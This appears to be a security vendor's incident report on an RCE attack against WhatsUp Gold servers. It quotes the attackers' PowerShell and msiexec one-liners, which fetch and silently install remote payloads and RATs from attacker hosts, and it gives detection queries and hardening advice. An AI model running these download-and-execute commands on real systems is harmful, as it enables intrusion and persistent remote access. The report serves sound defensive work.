Defending Against RCE Attacks Exploiting WhatsUp Gold Vulnerabilities
Discovery of Attacks in Trend Vision One
Initial infiltration
Surveillance carried out on Trend Vision One revealed that an unfamiliar script sourced from a suspicious URL was immediately activated on the system hosting WhatsUp Gold. Before the incident, there were no signs of unauthorized logins, access to suspicious URLs, or deployment of malware. These are common indicators in early-stage attacks; however, their absence suggests the involvement of a vulnerability.
The executable NmPoller.exe within WhatsUp Gold was found capable of executing an Active Monitor PowerShell Script as part of its intended functionality (See Figure 2). In this instance, threat actors exploited this feature for remote execution of arbitrary code.
The malicious code executed by NmPoller.exe had a specific format: the first lines were the prefix, while the last two lines contained the malicious code supplied by the threat actor. Multiple variations of this section have been identified, as demonstrated in Figure 3.
Action
Several PowerShell scripts were run through NmPoller.exe. The following scripts were executed as the malevolent component, combined multiple times with the prefix section outlined earlier:
(New-Object System.Net.WebClient).DownloadFile(‘hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837′,’c:programdataa.ps1’); powershell -exec bypass -file c:programdataa.ps1
msiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
msiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
iwr -uri hxxps://fedko[.]org/wp-includes/ID3/setup.msi -outfile c:windowstempMSsetup.msi ; msiexec /i c:windowstempMSsetup.msi /Qn
The file a.ps1 contained only one line:
[“(New-Object System.Net.WebClient).DownloadFile(‘hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe?language=en&app=61021689825303726412222891579678345108&hostname=hxxp://185.123.100[.]160′,’C:programdataftpd32.exe’);start-process C:programdataftpd32.exe;”]
Longevity
The threat actor’s goal in this scenario was to introduce remote administration tools using PowerShell. They made efforts to deploy these four remote access tools (RATs) via msiexec.exe (See Figure 4):
- Atera Agent
- Radmin
- SimpleHelp Remote Access
- Splashtop Remote
The installation of Atera Agent and Splashtop Remote was carried out using a single msi installer retrieved from the URL: hxxps://fedko[.]org/wp-includes/ID3/setup.msi.
The MXDR team successfully contained the incident with no further repercussions. While the threat actor remains unidentified, their use of multiple RATs hints at a possible ransomware affiliation.
Identification of Vulnerability and Exploitation
Timeline of Events
- August 16, 2024 – The vendor of the product released the latest patch along with the CVE identifiers
- August 30, 2024 5pm (UTC) – The individual who discovered the vulnerability published the PoC on GitHub
- August 30, 2024 10pm (UTC) – The Trend Micro MXDR team witnessed the initial incident exploiting the legitimate functionality of WhatsUp Gold
This sequence of events implies that exploit activities likely transpired on the same day, shortly after the PoC was made public. Given that the PoC was disclosed on the Friday before a prolonged weekend in the US, which included a public holiday, many organizations may have faced challenges in promptly applying the patch. Nevertheless, the patch had been released ahead of the PoC, indicating that a proactive approach to patch implementation, especially for critical vulnerabilities, could mitigate potential harm even in the absence of a PoC.
Censys has released an advisory revealing 1,207 exposed devices online for CVE-2024-4885, another vulnerability in WhatsUp Gold with a CVSS score of 9.8, which was rectified in June. This could have drawn threat actors’ attention as an exploitable surface following the disclosure of severe vulnerabilities in June.
Preventative Measures
The compromise of user authentication for WhatsUp Gold led to the incident on the affected host. Users of the product should implement the following measures to prevent a similar occurrence:
- Install the most recent patch promptly. Official information on the product, such as release notes and security bulletins, can be accessed on the vendor’s website.
- Secure the management console and API endpoints with access controls. Avoid exposing corporate tools to the public internet to prevent unauthorized access by malicious actors.
- Utilize strong passwords. Note that even if all patches have been applied and you are unaffected by the vulnerability, a weak password (e.g., admin:admin) without access controls could still result in exploitation.
Surveillance
To detect the observed attacks, monitoring of process creation events from the following processes was carried out:
- {Installed path for WhatsUp Gold}nmpoller.exe
For instance, if C:Program Files (x86)IpswitchWhatsUpnmpoller.exe generates processes similar to the following, it should raise suspicions:
- “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -exec bypass -file c:programdataa.ps1
- “C:Windowssystem32msiexec.exe” /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
- “C:Windowssystem32msiexec.exe” /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
- “C:Windowssystem32msiexec.exe” /i c:windowstempMSsetup.msi /Qn
Sample Query for Vision One Search App
- Search method: Endpoint Activity Data
- Query: “nmpoller.exe” AND eventSubId:(2 OR 101 OR 109 OR 901)
- Monitoring recommendations:
- Events like product restarts or daily log file creations will also be included in the results. Exclude regular events specific to your environment.
- Monitor any unusual spikes in event numbers within the search findings (See Figure 5).
Identified attack tactics (IAT) found using Vision One:
- Installation of External MSI Package using Msiexec (High)
- Installation of Questionable RAT (SimpleHelp) (Medium)
- Installation of Suspicious RAT (AteraAgent) (Medium)
- Creation of Suspicious RAT (Splashtop) File (Medium)
- Presence of Malicious Software – PUA.Win32.RAdmin.E (Medium)
It’s important to note that within the setup, NmPoller.exe is capable of executing PowerShell scripts without initiating another powershell.exe task. If there’s the ability to monitor PowerShell scripts using Antimalware Scan Interface (AMSI), ensure that all scripts run by WhatsUp Gold’s Active Monitor PowerShell Script feature are indeed the expected ones. To streamline monitoring efforts, it is advisable to temporarily suspend the usage of the Active Monitor PowerShell Script feature until the latest update is applied.
Moreover, owing to the vulnerability CVE-2024-6670 being described as enabling user account compromise, potential attacks might manifest as alternative incidents. Hence, until the latest update is in place, it’s recommended to tighten the access controls of WhatsUp Gold to a maximum extent and diligently monitor the events of all associated processes.
Summary
While patch management remains crucial, it’s consistently a challenging endeavor. In this instance, the Proof of Concept (PoC) was divulged multiple days post the release of the patch, and an incident seemingly influenced by the vulnerability was witnessed on the very day it was disclosed, merely a few hours post publication. This observed instance emphasizes that in cases where the rectification of a severe vulnerability is indicated, promptly applying the patch upon release is heavily advised, even in the absence of an available PoC.
Preventing incidents like this hinges not only on patch management but also on implementing various defensive strategies. Among the most prevalent defenses to mitigate risks are access control and multi-factor authentication (MFA), which security teams can implement using best practices such as:
- Restricting access to hosts/services meant for corporate use rather than exposing them publicly
- Avoid exposing the management consoles or API endpoints of products intended for corporate use to the public internet to evade being on threat actors’ radar.
- Enabling MFA for all network logins
- To forestall account compromise, it is recommended to have MFA activated for all user accounts accessing the network, or logging into Windows, Linux, or web applications.
- Additionally, ensure the utilization of robust passwords that have never been employed elsewhere.
- Utilizing passkeys
- Whenever feasible, opting for a passkey instead of a password is advisable.
- Passkeys leverage a cryptographic key stored on the device for logins, activated by local authentication like users’ biometrics for unlocking the device. Since there’s no need for passwords or manual input, and hence no strings of characters involved, passkeys are resilient against phishing attacks.
Maintaining a state of readiness and vigilance against cyber threats is crucial to ensure that emergency responses are directed solely towards genuine threats. Following this read, it’s hoped that security teams will review once more that no unintended hosts, or services are inadvertently exposed to the public internet as part of their preparatory efforts. This methodology is now acknowledged as part of attack surface management.
Organizations may also explore robust security solutions such as Trend Vision One™, which provides layered protection and behavior monitoring to thwart malicious tools and services before causing harm to user systems and devices.
About Author
